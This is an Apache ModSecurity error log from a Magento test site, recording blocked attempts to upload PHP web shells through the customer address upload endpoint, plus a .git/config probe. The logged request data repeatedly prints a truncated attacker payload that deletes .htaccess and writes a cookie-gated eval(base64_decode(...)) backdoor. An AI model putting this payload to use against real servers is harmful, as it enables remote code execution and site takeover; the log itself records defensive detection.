[Fri Jan 16 16:17:53.143688 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Rule 7f7c60c55be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.php8"] [unique_id "aWpWoeRfEYyDES-ZFL4mzQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:53.144132 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.php8"] [unique_id "aWpWoeRfEYyDES-ZFL4mzQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:53.146551 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.php8"] [unique_id "aWpWoeRfEYyDES-ZFL4mzQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 16 16:17:53.146727 2026] [:error] [pid 1444034] [client 46.149.66.101:37154] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/5/a588364f428d25.php8"] [unique_id "aWpWoeRfEYyDES-ZFL4mzQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:57.429537 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Rule 7f58bc765be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.phar"] [unique_id "aWvr4VS2Pw3fqVRuRUA6GgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:57.430069 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.phar"] [unique_id "aWvr4VS2Pw3fqVRuRUA6GgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:57.432615 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.phar"] [unique_id "aWvr4VS2Pw3fqVRuRUA6GgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:57.432809 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.phar"] [unique_id "aWvr4VS2Pw3fqVRuRUA6GgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:58.602901 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5u88364f428d25.php8 found within FILES:custom_attributes[country_id]: 5u88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWvr4lS2Pw3fqVRuRUA6GwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/u/5u88364f428d25.phar
[Sat Jan 17 21:06:58.603689 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWvr4lS2Pw3fqVRuRUA6GwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/u/5u88364f428d25.phar
[Sat Jan 17 21:06:58.603873 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aWvr4lS2Pw3fqVRuRUA6GwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/u/5u88364f428d25.phar
[Sat Jan 17 21:06:58.880995 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Rule 7f58bc765be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.php8"] [unique_id "aWvr4lS2Pw3fqVRuRUA6HAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:58.881480 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.php8"] [unique_id "aWvr4lS2Pw3fqVRuRUA6HAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:58.883908 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.php8"] [unique_id "aWvr4lS2Pw3fqVRuRUA6HAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 17 21:06:58.884116 2026] [:error] [pid 1465636] [client 213.109.225.211:37904] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/u/5u88364f428d25.php8"] [unique_id "aWvr4lS2Pw3fqVRuRUA6HAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 18 00:38:24.529268 2026] [php:error] [pid 1485247] [client 4.241.184.25:31731] script '/var/www/magento.test.indacotrentino.com/www/pub/images/g3.php' not found or unable to stat
[Sun Jan 18 05:25:26.654951 2026] [:error] [pid 1488396] [client 216.81.248.168:47030] [client 216.81.248.168] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWxgtnW4ISKXCXKKbs889gAAAAQ"]
[Sun Jan 18 05:25:26.655241 2026] [:error] [pid 1488396] [client 216.81.248.168:47030] [client 216.81.248.168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWxgtnW4ISKXCXKKbs889gAAAAQ"]
[Sun Jan 18 05:25:26.655388 2026] [:error] [pid 1488396] [client 216.81.248.168:47030] [client 216.81.248.168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWxgtnW4ISKXCXKKbs889gAAAAQ"]
[Mon Jan 19 00:21:15.599194 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Rule 7f40fc7debe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.phar"] [unique_id "aW1q638Nlj6XuVgqE4lbOgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:15.600932 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.phar"] [unique_id "aW1q638Nlj6XuVgqE4lbOgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:15.603387 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.phar"] [unique_id "aW1q638Nlj6XuVgqE4lbOgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:15.603594 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.phar"] [unique_id "aW1q638Nlj6XuVgqE4lbOgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:16.239867 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: rn88364f428d25.php8 found within FILES:custom_attributes[country_id]: rn88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW1q7H8Nlj6XuVgqE4lbOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/n/rn88364f428d25.phar
[Mon Jan 19 00:21:16.240537 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW1q7H8Nlj6XuVgqE4lbOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/n/rn88364f428d25.phar
[Mon Jan 19 00:21:16.240716 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW1q7H8Nlj6XuVgqE4lbOwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/n/rn88364f428d25.phar
[Mon Jan 19 00:21:16.541191 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Rule 7f40fc7debe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.php8"] [unique_id "aW1q7H8Nlj6XuVgqE4lbPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:16.541662 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.php8"] [unique_id "aW1q7H8Nlj6XuVgqE4lbPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:16.544029 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.php8"] [unique_id "aW1q7H8Nlj6XuVgqE4lbPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Jan 19 00:21:16.544202 2026] [:error] [pid 1507312] [client 194.110.207.198:55080] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/n/rn88364f428d25.php8"] [unique_id "aW1q7H8Nlj6XuVgqE4lbPAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.122026 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Rule 7f5e267b2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.phar"] [unique_id "aW7mjKn2cN71e3MmOdCpLwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.125384 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.phar"] [unique_id "aW7mjKn2cN71e3MmOdCpLwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
